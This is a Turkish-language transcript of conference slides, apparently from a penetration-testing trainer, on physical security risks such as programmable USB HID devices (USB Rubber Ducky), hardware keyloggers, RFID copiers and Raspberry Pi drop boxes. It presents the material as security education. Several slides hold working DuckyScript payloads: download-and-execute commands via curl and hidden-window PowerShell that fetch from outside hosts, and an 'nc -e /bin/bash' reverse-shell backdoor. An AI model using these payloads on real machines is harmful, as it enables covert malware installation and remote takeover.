Sızma Testlerinde Fiziksel Güvenlik Riskleri



Benzer belgeler
Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

İstemci Tabanlı Saldırı Türleri. Ozan UÇAR

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

01 Şirket Profili

BİLGİSAYAR GÜVENLİĞİ BİLGİSAYAR GÜVENLİĞİ BİLGİSAYAR GÜVENLİĞİ

ORDU ÜNİVERSİTESİ BİLGİ İŞLEM DAİRESİ BAŞKANLIĞI HİZMET ENVANTERİ TABLOSU

-Bilgisayarı oluşturan iki temel unsurdan diğeri ise YAZILIM dır.

Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği

KABLOSUZ AĞ GÜVENLİĞİNE KURUMSAL BAKIŞ

Güvenlik Riskleri ve Saldırı Yöntemleri. Ozan UÇAR Bilgi Güvenliği Akademisi (BGA)

BİT in Temel Bileşenleri (Yazılım-1)

HAVELSAN Siber Güvenlik Akademisi. Önlenemiyorsa Korunmak için Eğitim

IOT NEDİR? Bölüm 1. Internet of Things ekosistemi altında donanım, programlama, veri tabanı, veri analizi gibi alt yapılar yer almaktadır.

Özgür Yazılımlar ile Kablosuz Ağ Denetimi

EYLÜL 2012 İŞLETİM SİSTEMLERİ. Enformatik Bölümü

BÖLÜM 8. Bilişim Sistemleri Güvenliği. Doç. Dr. Serkan ADA

Doğu Akdeniz Üniversitesi Bilgisayar ve Teknoloji Yüksek Okulu Bilgi teknolojileri ve Programcılığı Bölümü DERS 1 - BİLGİSAYAR VE ÇEVRE ÜNİTELERİ

Ders İ zlencesi. Ders Başlığı. Dersin amacı. Önceden sahip olunması gereken beceri ve bilgiler. Önceden alınması gereken ders veya dersler

Windows İşletim Sistemi

WINDOWS 7. Eğitim ID 98 2/4 (Normal Seviye Kullanıcı) Konu ID Windows 7 Hakkında Genel Bilgi Ek Bilgi -

ERİŞİM ENGELLEME DOS VE DDOS:

HAKKARİ ÜNİVERSİTESİ Bilgi İşlem Daire Başkanlığı Hizmet Envanteri Tablosu Hizmetin Sunum Sürecinde. Hizmetin Dayanağı Mevzuatın Adı

MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI

Enerji, bankacılık, finans, telekomünikasyon gibi önemli sektörler Sinara Labs ile siber saldırılar a karşı güvende

AĞ GÜVENLİĞİ DERSİ. Donanımsal ağ güvenliğini ve bakımını sağlamak Yazılımsal ağ güvenliğini ve bakımını sağlamak. Ağ Güvenliği (Donanım)

Bilişim Teknolojilerine Giriş

Üniversal Takma Birimi, USB Type-C

Siber Teröristlere Karşı Kurumlar Nasıl Korunmalıdır? Yusuf TULGAR NetDataSoft Genel Müdürü

SÜRE BAŞLAMA TARİHİ : 19/12/2018 BİTİŞ TARİHİ : 20/02/2019 KURS SÜRESİ : 144 Saat KURS NO :

Kaspersky Open Space Security: Release 2. İşletmeniz için birinci sınıf bir BT güvenliği çözümü

WiFi RS232 Converter Sayfa 1 / 12. WiFi RS232 Converter. Teknik Döküman

Yerel Okul Sunucusu Uygulama Yazılımları Prototipi

Bilgisayar Donanımı. Temel Birimler ve Çevre Birimler. Öğr.Gör.Günay TEMÜR / KAYNAŞLI MESLEK YÜKSEOKULU

İşletim Sistemleri; İÇERİK. Yazılım BİLGİ TEKNOLOJİLERİ VE UYGULAMALARI Yazılım Türleri

YILDIZ TEKNİK ÜNİVERSİTESİ

Kurum Personeli için Kablosuz İnternet Erişimi (Wi-Fi) Kullanım Kılavuzu

Komut Penceresi ile Çalışmaya Başlamak

SIEMENS NX CAE YAZILIMLARI İÇİN COMPOSITE HOST ID VE MAC ADRESİ NASIL ÖĞRENİLİR?

KONU 1 BİLGİSAYAR VE ÇEVRE ÜNİTELERİ

KABLOSUZ 450N ÇİFT BANT USB 2.0 ADAPTÖR

Öğrenciler için Kablosuz İnternet Erişimi (Wi-Fi) Kullanım Kılavuzu

WiFi Relay Sayfa 1 / 11. WiFi Relay. Teknik Döküman

TEMEL BİLGİ TEKNOLOJİSİ KULLANIMI. Enformatik Bölümü

Linux Temelli Zararlı Yazılımların Bulaşma Teknikleri, Engellenmesi ve Temizlenmesi

ÖNDER BİLGİSAYAR KURSU. Sistem ve Ağ Uzmanlığı Eğitimi İçeriği

USB Keylogger İncelemesi

ORTA DOĞU TEKNİK ÜNİVERSİTESİ BİLGİ İŞLEM DAİRE BAŞKANLIĞI. Güvenlik ve Virüsler. ODTÜ BİDB İbrahim Çalışır, Ozan Tuğluk, Cengiz Acartürk

DONANIM VE YAZILIM. Bilişim Teknolojileri ve Yazılım Dersi

Yazılım/Donanım Farkı

BILGİSAYAR AĞLARI. Hakan GÖKMEN tarafından hazırlanmıştır.

(... GÜÇLÜ KORUMA, DÜŞÜK SİSTEM KAYNAĞI KULLANIMI...)

UITSEC-CERT. PETYA RANSOMWARE TEKNİK DETAYLARI BİLGİNİZE SUNULMUŞTUR. Version:2.0

AirTies Kablosuz Erişim Noktası (Access Point) olarak kullanacağınız cihazı bilgisayarınıza bağlayarak ayarlarını yapabilirsiniz.

TÜRK STANDARDLARI ENSTİTÜSÜ BİLİŞİM TEKNOLOJİLERİ TEST VE BELGELENDİRME DAİRESİ BAŞKANLIĞI SIZMA TESTİ UZMANI FAALİYETLERİ

VoIP Pentest NetSEC / Microso3 Türkiye Ozan UÇAR ozan.ucar@bga.com.tr

Bilindik engelleme yöntemlerinin dışında olan, kurumsal web filitreleri nasıl aşılır?

Bilgi Güvenliği Eğitim/Öğretimi

Linux Ubuntu Kurulumu


Mühür v Anasayfa:

Bilgi güvenliği konusunda farkındalık yaratmak. Mobil cihazlardaki riskleri anlatmak. Mobil uygulamaların bilgi güvenliği açısından incelemek 2

Temel Linux Eğitimi. İçindekiler

BİLGİSAYAR VE AĞ GÜVENLİĞİ ÖĞR. GÖR. MUSTAFA ÇETİNKAYA DERS 2 > AĞ VE UYGULAMA GÜVENLİĞİ

BitTorrent İstemci Kullanımı

Kurulum; Ana Bilgisayar ve Tahtalara ayrı ayrı yapılmaktadır. KURULUM ŞEMASI x.x x.x x.x x.

Öğr.Gör. Gökhan TURAN Gölhisar Meslek Yüksekokulu

Misafirler için Kablosuz İnternet Erişimi (Wi-Fi) Kullanım Kılavuzu

Yükleme kılavuzu Fiery Extended Applications 4.2 ile Command WorkStation 5.6

SIRA NO SORUMLU BİRİM FAALİYET SORUMLU DURUM AÇIKLAMA


BETİ GSM/GPRS MODEM KULLANIM KILAVUZU

İçindekiler Önsöz ix Giriş xi 1) Adli Bilimler ve Adli Bilişim 1 2) Adli Bilişimin Aşamaları 17

Linux Kurulumu (Sürüm 1.52) İçindekiler

Wolvox Kapı Ekranı. AKINSOFT Wolvox Kapı Ekranı Yardım Dosyası. Doküman Versiyon :

Finans Sektörüne Yönelik Yeni Nesil Tehditler. Burç Yıldırım Mart 2015

1.1. Yazılım Geliştirme Süreci

İnternet te Bireysel Güvenliği Nasıl Sağlarız? Rauf Dilsiz Bilgi Güvenliği Uzmanı

Malware Analizi Yöntem ve Araçları. Huzeyfe ÖNAL Bilgi Güvenliği

Ufuk Üniversitesi Kütüphanesi Kütüphane Kaynaklarına Erişim Bilgileri

İşletme ve Devreye Alma Planı Yerel Okul Sunucusu Uygulama Yazılımları Prototipi TRscaler Technology Solutions

RPMNET WOLVOX REPORTER

Temel Bilgisayar (Basic Computer) Yazılım (Software)

SAÜ BİLGİSAYAR VE BİLİŞİM BİLİMLERİ FAKÜLTESİ ORTAK BİLGİSAYAR DERSLERİ KOORDİNATÖRLÜĞÜ WİNDOWS 7 BÖLÜM SORULARI

EKLER EK 12UY0106-5/A4-1:

PLED-W600. Genel Bakış. WXGA Yüksek Çözünürlüklü LED Projeksiyon Cihazı

İşletim Sistemleri. Discovering Computers Living in a Digital World

BİLGİ İŞLEM DAİRE BAŞKANLIĞI İŞ TANIMLARI SIRA NO ADI SOYADI GÖREV TANIMLARI

Temel Bilgi Teknlolojileri 1. Ders notları 5. Öğr.Gör. Hüseyin Bilal MACİT 2017

V-Ray Lisanslama Sistemi

Güvenliğin Görüntülenmesi, Verilerin Analizi ve Atakların Eş Zamanlı Olarak Durdurulması. Akademik Bilişim Şubat 2006

Bilgi ve İletişim Teknolojileri (JFM 102) Ders 7. LINUX OS (Sistem Yapısı) BİLGİ & İLETİŞİM TEKNOLOJİLERİ. LINUX Yapısı

Setup Yardımcı Programı Kullanıcı Kılavuzu

Temel Bilgi Teknlolojileri 1. Ders notları 2. Öğr.Gör. Hüseyin Bilal MACİT 2017

06 - Bilgi Toplama ve Sosyal Mühendislik

Çalışma Adı : Uzaktan programlanabilir kayan yazı sistemi

DONANIM & YAZILIM Modül 2

İŞLETİM SİSTEMİNİN TEMELLERİ VE POST (İLK AÇILIŞ)

Tarih Saat Modül Adı Öğretim Üyesi. 01/05/2018 Salı 3 Bilgisayar Bilimlerine Giriş Doç. Dr. Hacer Karacan

İŞLETİM SİSTEMLERİ. Enformatik Bölümü

Transkript:

Sızma Testlerinde Fiziksel Güvenlik Riskleri Siber Güvenlik Konferansı 14 Harbiye / İstanbul

Konuşmacı Hakkında Ozan UÇAR Kıdemli Bilgi Güvenliği Danışmanı Eğitmen BGA Bilgi Güvenliği AKADEMİSİ ozan.ucar@bga.com.tr http://twitter.com/ucarozan www.cehturkiye.com & blog.bga.com.tr

Sunumun Amacı Nedir / Ne Değildir. Yazılımsal risklerin yanı sıra fiziksel güvenlik zafiyetlerinin bizlere (ve sizlere) etkisini tartışmak. Paranoyaklık yaratmak değildir. Yeni şeyler öğrenmek, fikir üretmek. Ve biraz eğlenmek :)

Fiziksel Etkileşimler USB aygıtlar ile bilgi alış verişi Klavye/Mouse kullanımları Kablosuz ağ kullanımları CD/DVD okuyuculara erişim Datacenter lardaki kabinler,raflar Fiziksel erişime açık, aktif ağ cihazları (router,switch,access point vb.)

Pratik Hayattan Fiziksel Riskler Gerçek hayatta pratik olarak karşılaşabileceğimiz fiziksel riskler; Programlanabilir USB Aygıtlar Sahte Kablosuz Ağlar RFC/NFC Yan Atak Saldırıları RFID Kopyalayıcılar Donanımsal Keyloggerlar Mini Donanımlar (Raspberry pi)

USB HID

USB HID

USB HID USB Rubber Ducky klavye chipsetine sahip programlanabilir konsept bir donanımdır. Kolaylıkla programlanabilir USB Rubber Ducky aynı zamanda içinde bulunan micro sd kart ile sisteme veri aktarabilme özelliğine de sahiptir.

USB HID / Hangi Sistemleri Etkiler? USB portundan erişim kurduğunuz tüm sistemlerde, - Linux / Windows / Mac OS X işletimi sistemine sahip tüm bilgisayarlarda. - Micro Usb Girişe Sahip Mobile Cihazlar (Android vb.) - Switch/Router gibi aktif ağ cihazları - Endüstriyel Sistemler

Neden İhtiyaç Duyarız? Komutarları sizden daha hızlı ve hatasız gönderir Siz kurbanı oyalarken, o saldırı gerçekleştirir. Çalışması zamanlanabilir (taktıkdan şu kadar süre sonra, kurban sisteme giriş yaptığında çalış gibi gibi) 1 dakikadan az sürede hedefe ulaşabilirsiniz (sadece hayal edip, uygulayın) Autorun özelliğine ihtiyaç yok! Antivirus, Sezgisel Antiloggerlar ve Firewall lar ile hiç sorunu yok.

USB HID / OS Attack Payloads Program indirip kurma,çalıştırma. Kullanıcı Oluşturma Dosya yükleme, arama, indirme Proxy in the Middle DNS ayarlarını değiştirme

USB HID / OS Attack Payloads Parola denemeleri Yerel parola özetlerini elde etmek (LM/NTLM Hash) Aktif kullanıcı parolalarını almak (mimikatz) Klavye kısa yolları ile hayal ettiğiniz herşey Söz sizde...

USB HID / Wifi Attack Payloads Bilgisayarı kablosuz ağ üzerinen erişime açma Sahte bir kablosuz ağa bağlantı

USB HID / Wifi Attack Payloads Proxy in the Middle

Uygulamalar / Android Cep telefonlarının casus yazılımlar ile uzaktan kontrolü Demo: https://www.youtube.com/watch? v=lo6ddgsv_u0

Uygulamalar / Windows Windows Sistemlere Casus yazılım bulaştırma (Powershell aracılığı ile)

USB HID / Programlama (DucyScript) USB Rubber Ducky nin programlanması için kullanılan dile verilen isim DuckyScript dir. Herhangi bir text editörü ile yazılabilir.(nano, VI, gedit, notepad vb.) Basit bir sözdizimine sahiptir, tüm komutlar bir satırda ve büyük harfler kullanılarak yazılmalıdır.

USB HID / Programlama (DucyScript) Windows Test DELAY 3000 GUI R DELAY 500 STRING notepad DELAY 500 ENTER DELAY 750 STRING Merhaba Dunya!!! ENTER Mac OS X Download & Execute DELAY 1000 COMMAND SPACE DELAY 800 STRING Terminal DELAY 500 ENTER DELAY 500 STRING curl http://www.site.com/ script.py > file.py ENTER DELAY 1000 STRING python file.py ENTER Windows Download & Execute DELAY 3000 GUI r DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadF ile('http://site.com/aa.exe','%temp %\bb.exe'); DELAY 100 STRING Start-Process "%TEMP% \bb.exe" ENTER

USB HID / Programlama (DucyScript) Simple Duck Payload Generator https://code.google.com/p/simple-ducky-payload-generator/

USB HID / Programlama (DucyScript) Online Ducky Toolkit http://www.ducktoolkit.com

Uygulamalar / Windows GUI r DELAY 100 STRING powershell -windowstyle hidden (newobject System.Net.WebClient).DownloadFile(' http://89.95.238.x/b.txt','%temp%\ajan007.exe'); Start-Process "%TEMP%\winmgmt.exe" ENTER

Uygulamalar / Windows

Uygulamalar / Mac OS X & Linux Mac OS X / Linux sistemlere kalıcı arka kapı bulaştırma.

Uygulamalar / Mac OS X & Linux CTRL-ALT T DELAY 400 ENTER DELAY 300 STRING touch.script.sh ENTER STRING echo nc -nv ipport -e /bin/bash >.script.sh ENTER STRING chmod +x.script.sh ENTER STRING./.script.sh ; bg ENTER DELAY 200 CTRL z DELAY 400 STRING exit ENTER

Hardware Keylogger Klavye girişlerini hafızasına kaydeder. Kablosuz ağ üzerinden veri aktarma özelliğine sahip modelleri vardır.

RFID Kart Çoğaltıcılar Kullanım alanları; Kapı vb. kimlik doğrulama durumlarında Casino lar Bizim spor salonunun giriş turnikeleri :P http://www.ebay.com/bhp/rfid-copier

Raspberry pi Mini bilgisayar Yerel ağlara fiziksel erişimlerde kullanılır. Wifi/3G destekler http://en.wikipedia.org/wiki/raspberry_pi

Raspberry pi Kullanım Alanları Fiziksel erişim kurulduğu durumlarda; Hedef olacak noktalar; Yazılıcılar Projeksiyon Cihazları Switch

Raspberry pi Kullanım Alanları Fiziksel erişim kurulduğu durumlarda; Amaçlar; 802.1x kontrolleri vb. kontroller dummy cihazlar için -genellikle- kapatılır, yerel ağa uzaktan tam erişim sağlamak için ideal yöntem.